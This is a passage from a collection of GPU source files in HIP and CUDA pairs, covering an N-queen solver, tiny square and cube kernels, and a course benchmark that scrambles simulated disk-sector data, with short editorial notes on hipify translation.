printf("Usage: %s [-c|-g] n steps\n", argv[0]); printf(" -c: CPU only\n"); printf(" -g: GPU only\n"); printf(" n: n-queen\n"); printf(" steps: step for GPU\n"); printf("Default to 8 queen\n"); } else { n = atoi(argv[argstart]); if(n <= 1 || n > 32) { printf("Invalid n, n should be > 1 and <= 32\n"); printf("Note: n > 18 will require a very very long time to compute!\n"); return 0; } if(argc >= argstart + 2) { steps = atoi(argv[argstart + 1]); if(steps <= THREAD_NUM || steps % THREAD_NUM != 0) { printf("Invalid step, step should be multiple of %d\n", THREAD_NUM); return 0; } } } if(gpu) { if(!InitCUDA()) { return 0; } printf("CUDA initialized.\n"); } if(cpu) { CUDA_SAFE_CALL( hipDeviceSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); //start = clock(); solution = 
solve_nqueen(n); //solve_nqueen_mcpu(n); //solution = solve_nqueen(n); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("CPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } if(gpu) { //start = clock(); CUDA_SAFE_CALL( hipDeviceSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); solution = solve_nqueen_cuda(n, steps); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("GPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } return 0; }
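Editor's note: the .cu record that follows is the pre-hipify original of the file above; the systematic differences within each pair are the runtime API names (hip* versus cuda*) and the kernel-launch syntax. The toy HIP program below, which is not part of the original sources, shows the macro form hipify emits next to the triple-chevron form it replaces (hipcc accepts both; the kernel and values are made up for illustration).

// Editorial sketch only: compares the two launch syntaxes seen throughout this file pair.
#include <hip/hip_runtime.h>
#include <cstdio>

__global__ void fill(int *out, int value) { out[threadIdx.x] = value; }

int main()
{
    int *d = nullptr;
    hipMalloc(&d, 4 * sizeof(int));                          // templated overload, no cast needed
    fill<<<1, 4>>>(d, 7);                                    // CUDA-style triple-chevron launch
    hipLaunchKernelGGL(fill, dim3(1), dim3(4), 0, 0, d, 9);  // hipify form: grid, block, shared bytes, stream, args
    int h[4];
    hipMemcpy(h, d, sizeof(h), hipMemcpyDeviceToHost);
    std::printf("%d %d %d %d\n", h[0], h[1], h[2], h[3]);    // expected: 9 9 9 9 (second launch ran last)
    hipFree(d);
    return 0;
}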
122f8e2edebd52308521259b8f2f8588ac61c46e.cu
// N-queen for CUDA // // Copyright(c) 2008 Ping-Che Chen //#define WIN32_LEAN_AND_MEAN //#include <windows.h> #include <stdio.h> #include <cutil.h> #define THREAD_NUM 96 int bunk = 0; // this is a dummy variable used for making sure clock() are not optimized out /* * ---------------------------------------------------------------- * This is a recursive version of n-queen backtracking solver. * A non-recursive version is used instead. * ---------------------------------------------------------------- long long solve_nqueen_internal(int n, unsigned int mask, unsigned int l_mask, unsigned int r_mask, unsigned int t_mask) { if(mask == t_mask) { return 1; } unsigned int m = (mask | l_mask | r_mask); if((m & t_mask) == t_mask) { return 0; } long long total = 0; unsigned int index = (m + 1) & ~m; while((index & t_mask) != 0) { total += solve_nqueen_internal(mask | index, (l_mask | index) << 1, (r_mask | index) >> 1, t_mask); m |= index; index = (m + 1) & ~m; } return total; } long long solve_nqueen(int n) { return solve_nqueen_internal(0, 0, 0, (1 << n) - 1); } */ /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver. * This provides the basis for the CUDA version. * ------------------------------------------------------------------- */ long long solve_nqueen(int n) { unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; if(n <= 0 || n > 32) { return 0; } const unsigned int t_mask = (1 << n) - 1; long long total = 0; long long upper_total = 0; int i = 0, j; unsigned int index; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; for(j = 0; j < (n + 1) / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; if(n % 2 == 1 && j == (n + 1) / 2 - 1) { upper_total = total; total = 0; } while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = ((m[i] + 1) ^ m[i]) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == n) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } } bunk = 2; if(n % 2 == 0) { return total * 2; } else { return upper_total * 2 + total; } } /* ------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver * with multi-thread support. 
* ------------------------------------------------------------------- */ /* struct thread_context { HANDLE thread; bool stop; long long total; int n; unsigned int mask; unsigned int l_mask; unsigned int r_mask; unsigned int t_mask; HANDLE ready; HANDLE complete; }; DWORD WINAPI solve_nqueen_proc(LPVOID param) { thread_context* ctx = (thread_context*) param; unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int t_mask; long long total; unsigned int index; unsigned int mark; for(;;) { WaitForSingleObject(ctx->ready, INFINITE); if(ctx->stop) { break; } int i = 0; mask[0] = ctx->mask; l_mask[0] = ctx->l_mask; r_mask[0] = ctx->r_mask; m[0] = mask[0] | l_mask[0] | r_mask[0]; total = 0; t_mask = ctx->t_mask; mark = ctx->n; while(i >= 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; } } else { i --; } } } ctx->total = total; SetEvent(ctx->complete); } return 0; } long long solve_nqueen_mcpu(int n) { if(n <= 0 || n > 32) { return 0; } SYSTEM_INFO info; thread_context* threads; int num_threads; GetSystemInfo(&info); num_threads = info.dwNumberOfProcessors; if(num_threads == 1) { // only one cpu found, use single thread version return solve_nqueen(n); } threads = new thread_context[num_threads]; int j; for(j = 0; j < num_threads; j++) { threads[j].stop = false; threads[j].ready = CreateEvent(0, FALSE, FALSE, 0); threads[j].complete = CreateEvent(0, FALSE, TRUE, 0); threads[j].thread = CreateThread(0, 0, solve_nqueen_proc, threads + j, 0, 0); threads[j].total = 0; } int thread_idx = 0; const unsigned int t_mask = (1 << n) - 1; long long total = 0; unsigned int index; unsigned int m_mask = 0; if(n % 2 == 1) { m_mask = 1 << ((n + 1) / 2 - 1); } for(j = 0; j < (n + 1) / 2; j++) { index = 1 << j; WaitForSingleObject(threads[thread_idx].complete, INFINITE); if(threads[thread_idx].mask != m_mask) { total += threads[thread_idx].total * 2; } else { total += threads[thread_idx].total; } threads[thread_idx].mask = index; threads[thread_idx].l_mask = index << 1; threads[thread_idx].r_mask = index >> 1; threads[thread_idx].t_mask = t_mask; threads[thread_idx].total = 0; threads[thread_idx].n = n - 1; SetEvent(threads[thread_idx].ready); thread_idx = (thread_idx + 1) % num_threads; } // collect all threads... HANDLE* events = new HANDLE[num_threads]; for(j = 0; j < num_threads; j++) { events[j] = threads[j].complete; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { if(threads[j].mask != m_mask) { total += threads[j].total * 2; } else { total += threads[j].total; } threads[j].stop = true; SetEvent(threads[j].ready); events[j] = threads[j].thread; } WaitForMultipleObjects(num_threads, events, TRUE, INFINITE); for(j = 0; j < num_threads; j++) { CloseHandle(threads[j].thread); CloseHandle(threads[j].ready); CloseHandle(threads[j].complete); } delete[] threads; delete[] events; bunk = 3; return total; } */ /* -------------------------------------------------------------------------- * This is a non-recursive version of n-queen backtracking solver for CUDA. * It receives multiple initial conditions from a CPU iterator, and count * each conditions. 
* -------------------------------------------------------------------------- */ __global__ void solve_nqueen_cuda_kernel(int n, int mark, unsigned int* total_masks, unsigned int* total_l_masks, unsigned int* total_r_masks, unsigned int* results, int total_conditions) { const int tid = threadIdx.x; const int bid = blockIdx.x; const int idx = bid * blockDim.x + tid; __shared__ unsigned int mask[THREAD_NUM][10]; __shared__ unsigned int l_mask[THREAD_NUM][10]; __shared__ unsigned int r_mask[THREAD_NUM][10]; __shared__ unsigned int m[THREAD_NUM][10]; __shared__ unsigned int sum[THREAD_NUM]; const unsigned int t_mask = (1 << n) - 1; int total = 0; int i = 0; unsigned int index; if(idx < total_conditions) { mask[tid][i] = total_masks[idx]; l_mask[tid][i] = total_l_masks[idx]; r_mask[tid][i] = total_r_masks[idx]; m[tid][i] = mask[tid][i] | l_mask[tid][i] | r_mask[tid][i]; while(i >= 0) { if((m[tid][i] & t_mask) == t_mask) { i--; } else { index = (m[tid][i] + 1) & ~m[tid][i]; m[tid][i] |= index; if((index & t_mask) != 0) { if(i + 1 == mark) { total++; i--; } else { mask[tid][i + 1] = mask[tid][i] | index; l_mask[tid][i + 1] = (l_mask[tid][i] | index) << 1; r_mask[tid][i + 1] = (r_mask[tid][i] | index) >> 1; m[tid][i + 1] = (mask[tid][i + 1] | l_mask[tid][i + 1] | r_mask[tid][i + 1]); i++; } } else { i --; } } } sum[tid] = total; } else { sum[tid] = 0; } __syncthreads(); // reduction if(tid < 64 && tid + 64 < THREAD_NUM) { sum[tid] += sum[tid + 64]; } __syncthreads(); if(tid < 32) { sum[tid] += sum[tid + 32]; } __syncthreads(); if(tid < 16) { sum[tid] += sum[tid + 16]; } __syncthreads(); if(tid < 8) { sum[tid] += sum[tid + 8]; } __syncthreads(); if(tid < 4) { sum[tid] += sum[tid + 4]; } __syncthreads(); if(tid < 2) { sum[tid] += sum[tid + 2]; } __syncthreads(); if(tid < 1) { sum[tid] += sum[tid + 1]; } __syncthreads(); if(tid == 0) { results[bid] = sum[0]; } } long long solve_nqueen_cuda(int n, int steps) { // generating start conditions unsigned int mask[32]; unsigned int l_mask[32]; unsigned int r_mask[32]; unsigned int m[32]; unsigned int index; if(n <= 0 || n > 32) { return 0; } unsigned int* total_masks = new unsigned int[steps]; unsigned int* total_l_masks = new unsigned int[steps]; unsigned int* total_r_masks = new unsigned int[steps]; unsigned int* results = new unsigned int[steps]; unsigned int* masks_cuda; unsigned int* l_masks_cuda; unsigned int* r_masks_cuda; unsigned int* results_cuda; cudaMalloc((void**) &masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &l_masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &r_masks_cuda, sizeof(int) * steps); cudaMalloc((void**) &results_cuda, sizeof(int) * steps / THREAD_NUM); const unsigned int t_mask = (1 << n) - 1; const unsigned int mark = n > 11 ? 
n - 10 : 2; long long total = 0; int total_conditions = 0; int i = 0, j; mask[0] = 0; l_mask[0] = 0; r_mask[0] = 0; m[0] = 0; bool computed = false; for(j = 0; j < n / 2; j++) { index = (1 << j); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } } if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } total *= 2; if(n % 2 == 1) { computed = false; total_conditions = 0; index = (1 << (n - 1) / 2); m[0] |= index; mask[1] = index; l_mask[1] = index << 1; r_mask[1] = index >> 1; m[1] = (mask[1] | l_mask[1] | r_mask[1]); i = 1; while(i > 0) { if((m[i] & t_mask) == t_mask) { i--; } else { index = (m[i] + 1) & ~m[i]; m[i] |= index; if((index & t_mask) != 0) { mask[i + 1] = mask[i] | index; l_mask[i + 1] = (l_mask[i] | index) << 1; r_mask[i + 1] = (r_mask[i] | index) >> 1; m[i + 1] = (mask[i + 1] | l_mask[i + 1] | r_mask[i + 1]); i++; if(i == mark) { total_masks[total_conditions] = mask[i]; total_l_masks[total_conditions] = l_mask[i]; total_r_masks[total_conditions] = r_mask[i]; total_conditions++; if(total_conditions == steps) { if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } // start computation cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * 
total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); computed = true; total_conditions = 0; } i--; } } else { i --; } } } if(computed) { cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } computed = false; } cudaMemcpy(masks_cuda, total_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(l_masks_cuda, total_l_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); cudaMemcpy(r_masks_cuda, total_r_masks, sizeof(int) * total_conditions, cudaMemcpyHostToDevice); solve_nqueen_cuda_kernel<<<steps/THREAD_NUM, THREAD_NUM>>>(n, n - mark, masks_cuda, l_masks_cuda, r_masks_cuda, results_cuda, total_conditions); cudaMemcpy(results, results_cuda, sizeof(int) * steps / THREAD_NUM, cudaMemcpyDeviceToHost); for(int j = 0; j < steps / THREAD_NUM; j++) { total += results[j]; } } cudaFree(masks_cuda); cudaFree(l_masks_cuda); cudaFree(r_masks_cuda); cudaFree(results_cuda); delete[] total_masks; delete[] total_l_masks; delete[] total_r_masks; delete[] results; bunk = 1; return total; } bool InitCUDA() { int count; cudaGetDeviceCount(&count); if(count == 0) { fprintf(stderr, "There is no device.\n"); return false; } int i; for(i = 0; i < count; i++) { cudaDeviceProp prop; if(cudaGetDeviceProperties(&prop, i) == cudaSuccess) { if(prop.major >= 1) { break; } } } if(i == count) { fprintf(stderr, "There is no device supporting CUDA 1.x.\n"); return false; } cudaSetDevice(i); return true; } int main(int argc, char** argv) { unsigned int hTimer; double gpuTime; // initialise card and timer int deviceCount; CUDA_SAFE_CALL_NO_SYNC(cudaGetDeviceCount(&deviceCount)); if (deviceCount == 0) { fprintf(stderr, "There is no device.\n"); exit(EXIT_FAILURE); } int dev; for (dev = 0; dev < deviceCount; ++dev) { cudaDeviceProp deviceProp; CUDA_SAFE_CALL_NO_SYNC(cudaGetDeviceProperties(&deviceProp, dev)); if (deviceProp.major >= 1) break; } if (dev == deviceCount) { fprintf(stderr, "There is no device supporting CUDA.\n"); exit(EXIT_FAILURE); } else CUDA_SAFE_CALL(cudaSetDevice(dev)); CUT_SAFE_CALL( cutCreateTimer(&hTimer) ); int n = 12; clock_t start, end; long long solution; bool cpu = true, gpu = true; int argstart = 1, steps = 24576; if(argc >= 2 && argv[1][0] == '-') { if(argv[1][1] == 'c' || argv[1][1] == 'C') { gpu = false; } else if(argv[1][1] == 'g' || argv[1][1] == 'G') { cpu = false; } argstart = 2; } if(argc < argstart + 1) { printf("Usage: %s [-c|-g] n steps\n", argv[0]); printf(" -c: CPU only\n"); printf(" -g: GPU only\n"); printf(" n: n-queen\n"); printf(" steps: step for GPU\n"); printf("Default to 8 queen\n"); } else { n = atoi(argv[argstart]); if(n <= 1 || n > 32) { printf("Invalid n, n should be > 1 and <= 32\n"); printf("Note: n > 18 will require a very very long time to compute!\n"); return 0; } if(argc >= argstart + 2) { steps = atoi(argv[argstart + 1]); if(steps <= THREAD_NUM || steps % THREAD_NUM != 0) { printf("Invalid step, step should be multiple of %d\n", THREAD_NUM); return 0; } } } if(gpu) { if(!InitCUDA()) { return 0; } printf("CUDA initialized.\n"); } if(cpu) { CUDA_SAFE_CALL( cudaThreadSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); //start = clock(); solution = solve_nqueen(n); //solve_nqueen_mcpu(n); //solution = solve_nqueen(n); //end = clock(); CUT_SAFE_CALL( 
cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("CPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } if(gpu) { //start = clock(); CUDA_SAFE_CALL( cudaThreadSynchronize() ); CUT_SAFE_CALL( cutResetTimer(hTimer) ); CUT_SAFE_CALL( cutStartTimer(hTimer) ); solution = solve_nqueen_cuda(n, steps); //end = clock(); CUT_SAFE_CALL( cutStopTimer(hTimer) ); gpuTime = cutGetTimerValue(hTimer); printf("GPU: %d queen = %lld time = %f msec\n", n, solution, gpuTime); } return 0; }
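Editor's note: both the host solver and the CUDA kernel in this pair advance the backtracking search with the expression (m + 1) & ~m, which isolates the lowest zero bit of the occupancy mask m, that is, the next column not yet attacked in the current row. Below is a minimal host-only sketch of that bit trick, added for illustration only; the mask values are made up and nothing in it appears in the original sources.

// Editorial sketch only: demonstrates the lowest-zero-bit trick used by the N-queen solvers above.
#include <stdio.h>

int main(void)
{
    unsigned int m = 0x0B;                 /* 0b1011: columns 0, 1 and 3 already blocked */
    unsigned int t_mask = (1u << 4) - 1;   /* 4-column board                             */

    while (1) {
        unsigned int index = (m + 1) & ~m; /* lowest zero bit of m = next free column    */
        if ((index & t_mask) == 0)         /* no free column left on the board           */
            break;
        printf("next free column bit: 0x%X\n", index);
        m |= index;                        /* mark the column as tried, exactly as the solvers do */
    }
    return 0;
}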
4ade85d8bfa0bf3905e3ce48e599ba4dd48ec7b8.hip
// !!! This is a file automatically generated by hipify!!!
#include <hip/hip_runtime.h>
#include <hip/hip_runtime.h>
#include <hip/hip_runtime_api.h>

#include <math/cuda_ops.hpp>

__global__ void square(int* d_out, const int base){
    *d_out = base * base;
}

__global__ void cube(int* d_out, const int base){
    *d_out = base * base * base;
}

int square_cuda(int base) {
    int BYTES = sizeof(int);

    // Declare the host output value and the pointer to device output memory
    int h_out;
    int* d_out;

    // Allocate memory on the GPU
    hipMalloc((void**) &d_out, BYTES);

    // Start kernel
    hipLaunchKernelGGL((square), dim3(1), dim3(1), 0, 0, d_out, base);

    // Copy the output data from device to host
    hipMemcpy(&h_out, d_out, BYTES, hipMemcpyDeviceToHost);

    // Free the device memory
    hipFree(d_out);

    return h_out;
}

int cube_cuda(int base) {
    int BYTES = sizeof(int);

    // Declare the host output value and the pointer to device output memory
    int h_out;
    int* d_out;

    // Allocate memory on the GPU
    hipMalloc((void**) &d_out, BYTES);

    // Start kernel
    hipLaunchKernelGGL((cube), dim3(1), dim3(1), 0, 0, d_out, base);

    // Copy the output data from device to host
    hipMemcpy(&h_out, d_out, BYTES, hipMemcpyDeviceToHost);

    // Free the device memory
    hipFree(d_out);

    return h_out;
}
4ade85d8bfa0bf3905e3ce48e599ba4dd48ec7b8.cu
#include <cuda.h>
#include <cuda_runtime.h>
#include <cuda_runtime_api.h>

#include <math/cuda_ops.hpp>

__global__ void square(int* d_out, const int base){
    *d_out = base * base;
}

__global__ void cube(int* d_out, const int base){
    *d_out = base * base * base;
}

int square_cuda(int base) {
    int BYTES = sizeof(int);

    // Declare the host output value and the pointer to device output memory
    int h_out;
    int* d_out;

    // Allocate memory on the GPU
    cudaMalloc((void**) &d_out, BYTES);

    // Start kernel
    square<<<1, 1>>>(d_out, base);

    // Copy the output data from device to host
    cudaMemcpy(&h_out, d_out, BYTES, cudaMemcpyDeviceToHost);

    // Free the device memory
    cudaFree(d_out);

    return h_out;
}

int cube_cuda(int base) {
    int BYTES = sizeof(int);

    // Declare the host output value and the pointer to device output memory
    int h_out;
    int* d_out;

    // Allocate memory on the GPU
    cudaMalloc((void**) &d_out, BYTES);

    // Start kernel
    cube<<<1, 1>>>(d_out, base);

    // Copy the output data from device to host
    cudaMemcpy(&h_out, d_out, BYTES, cudaMemcpyDeviceToHost);

    // Free the device memory
    cudaFree(d_out);

    return h_out;
}
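Editor's note: a minimal driver for the pair above, showing how the two host wrappers would typically be called. It assumes math/cuda_ops.hpp declares square_cuda and cube_cuda (the prototypes are repeated here so the sketch is self-contained); it is not part of the original sources.

// Editorial sketch only.
#include <cstdio>

int square_cuda(int base);  // assumed prototype, matching the definition above
int cube_cuda(int base);    // assumed prototype, matching the definition above

int main()
{
    // Each call allocates one int on the device, launches a single-thread kernel,
    // copies the result back to the host and frees the device buffer.
    std::printf("square_cuda(7) = %d\n", square_cuda(7));   // expected 49
    std::printf("cube_cuda(3)   = %d\n", cube_cuda(3));     // expected 27
    return 0;
}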
9120fe38d32f8885d391d1bf984a6dade7c14e5f.hip
// !!! This is a file automatically generated by hipify!!!
//
// Tomás Oliveira e Silva / António Rui Borges
//
// ACA 2019/2020
//
// Reference implementation 1
//

#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "common.h"
#include <hip/hip_runtime.h>


////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// program configuration
//

#ifndef SECTOR_SIZE
# define SECTOR_SIZE 512
#endif
#ifndef N_SECTORS
# define N_SECTORS (1 << 21)
#endif

static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors,
                                      unsigned int sector_size);
__global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number,
                                                  unsigned int n_sectors, unsigned int sector_size);
static double get_delta_time(void);


////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Main program
//

int main (int argc, char **argv)
{
  printf("%s Starting...\n", argv[0]);
  if (sizeof (unsigned int) != (size_t) 4)
     return 1;                                    // fail with prejudice if an integer does not have 4 bytes

  // set up device
  int dev = 0;
  int i;

  hipDeviceProp_t deviceProp;
  CHECK (hipGetDeviceProperties (&deviceProp, dev));
  printf("Using Device %d: %s\n", dev, deviceProp.name);
  CHECK (hipSetDevice (dev));

  // create memory areas in host and device memory where the disk sectors data and sector numbers will be stored
  size_t sector_data_size;
  size_t sector_number_size;
  unsigned int *host_sector_data, *host_sector_number;
  unsigned int *device_sector_data, *device_sector_number;

  sector_data_size = (size_t) N_SECTORS * (size_t) SECTOR_SIZE;
  sector_number_size = (size_t) N_SECTORS * sizeof (unsigned int);
  if ((sector_data_size + sector_number_size) > (size_t) 1.3e9)
     { fprintf (stderr,"The GTX 1060 cannot handle more than 5.5GiB of memory!\n");
       exit (1);
     }
  printf ("Total sector data size: %lu\n", sector_data_size);
  printf ("Total sector numbers data size: %lu\n", sector_number_size);

  host_sector_data = (unsigned int *) malloc (sector_data_size);
  host_sector_number = (unsigned int *) malloc (sector_number_size);
  CHECK (hipMalloc ((void **) &device_sector_data, sector_data_size));
  CHECK (hipMalloc ((void **) &device_sector_number, sector_number_size));

  // initialize the host data
  (void) get_delta_time ();
  srand(0xACA2019);
  for (i = 0; i < (int) (sector_data_size / (int) sizeof(unsigned int)); i++)
    host_sector_data[i] = 108584447u * (unsigned int) i;    // "pseudo-random" data (faster than using the rand() function)
  for(i = 0; i < (int) (sector_number_size / (int)sizeof(unsigned int)); i++)
    host_sector_number[i] = (rand () & 0xFFFF) | ((rand () & 0xFFFF) << 16);
  printf ("The initialization of host data took %.3e seconds\n",get_delta_time ());

  // copy the host data to the device memory
  (void) get_delta_time ();
  CHECK (hipMemcpy (device_sector_data, host_sector_data, sector_data_size, hipMemcpyHostToDevice));
  CHECK (hipMemcpy (device_sector_number, host_sector_number, sector_number_size, hipMemcpyHostToDevice));
  printf ("The transfer of %ld bytes from the host to the device took %.3e seconds\n",
          (long) sector_data_size + (long) sector_number_size, get_delta_time ());

  // run the computational kernel
  // as an example, N_SECTORS threads are launched where each thread deals with one sector
  unsigned int gridDimX,gridDimY,gridDimZ,blockDimX,blockDimY,blockDimZ;
  int n_sectors, sector_size;

  n_sectors = N_SECTORS;
  sector_size = SECTOR_SIZE;
  blockDimX = 1 << 0;                             // optimize!
  blockDimY = 1 << 3;                             // optimize!
  blockDimZ = 1;                                  // optimize!
  gridDimX = 1 << 12;                             // optimize!
  gridDimY = 1 << 6;                              // optimize!
  gridDimZ = 1;                                   // optimize!
  if ((blockDimX * blockDimY * blockDimZ * gridDimX * gridDimY * gridDimZ) != N_SECTORS)
     { fprintf (stderr,"Wrong launch configuration!\n");
       exit (1);
     }
  dim3 grid (gridDimX, gridDimY, gridDimZ);
  dim3 block (blockDimX, blockDimY, blockDimZ);

  (void) get_delta_time ();
  hipLaunchKernelGGL(( modify_sector_cuda_kernel), dim3(grid), dim3(block), 0, 0, device_sector_data, device_sector_number, n_sectors, sector_size);
  CHECK (hipDeviceSynchronize ());                // wait for kernel to finish
  CHECK (hipGetLastError ());                     // check for kernel errors
  printf("The CUDA kernel <<<(%d,%d,%d), (%d,%d,%d)>>> took %.3e seconds to run\n",
         gridDimX, gridDimY, gridDimZ, blockDimX, blockDimY, blockDimZ, get_delta_time ());

  // copy kernel result back to host side
  unsigned int *modified_device_sector_data;
  modified_device_sector_data = (unsigned int *) malloc (sector_data_size);
  CHECK (hipMemcpy (modified_device_sector_data, device_sector_data, sector_data_size, hipMemcpyDeviceToHost));
  printf ("The transfer of %ld bytes from the device to the host took %.3e seconds\n",
          (long) sector_data_size, get_delta_time ());

  // free device global memory
  CHECK (hipFree (device_sector_data));
  CHECK (hipFree (device_sector_number));

  // reset device
  CHECK (hipDeviceReset ());

  // compute the modified sector data on the CPU
  (void) get_delta_time ();
  for (i = 0; i < N_SECTORS; i++)
    modify_sector_cpu_kernel (&host_sector_data[i*SECTOR_SIZE/(sizeof (unsigned int))], host_sector_number[i], n_sectors, sector_size);
  printf("The cpu kernel took %.3e seconds to run (single core)\n",get_delta_time ());

  // compare
  for(i = 0; i < (int) sector_data_size / (int) sizeof (unsigned int); i++)
    if (host_sector_data[i] != modified_device_sector_data[i])
       { int sector_words = sector_size / (int) sizeof (unsigned int);
         printf ("Mismatch in sector %d, word %d\n", i / sector_words, i % sector_words);
         exit(1);
       }
  printf ("All is well!\n");

  // free host memory
  free (host_sector_data);
  free (host_sector_number);
  free (modified_device_sector_data);

  return 0;
}

static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors,
                                      unsigned int sector_size)
{
  unsigned int x, i, a, c, n_words;

  // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4)
  n_words = sector_size / 4u;

  // initialize the linear congruencial pseudo-random number generator
  // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c)
  i = sector_number;                              // get the sector number
  a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2);     // a must be a multiple of 4 plus 1
  c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3);     // c must be odd
  x = 0xACA02019u;                                // initial state

  // modify the sector data
  for (i = 0u; i < n_words; i++)
    { x = a * x + c;                              // update the pseudo-random generator state
      sector_data[i] ^= x;                        // modify the sector data
    }
}

__global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number,
                                                  unsigned int n_sectors, unsigned int sector_size)
{
  unsigned int x, y, idx, i, a, c, n_words;

  // compute the thread number
  x = (unsigned int) threadIdx.x + (unsigned int) blockDim.x * (unsigned int) blockIdx.x;
  y = (unsigned int) threadIdx.y + (unsigned int) blockDim.y * (unsigned int) blockIdx.y;
  idx = (unsigned int) blockDim.x * (unsigned int) gridDim.x * y + x;
  if (idx >= n_sectors)
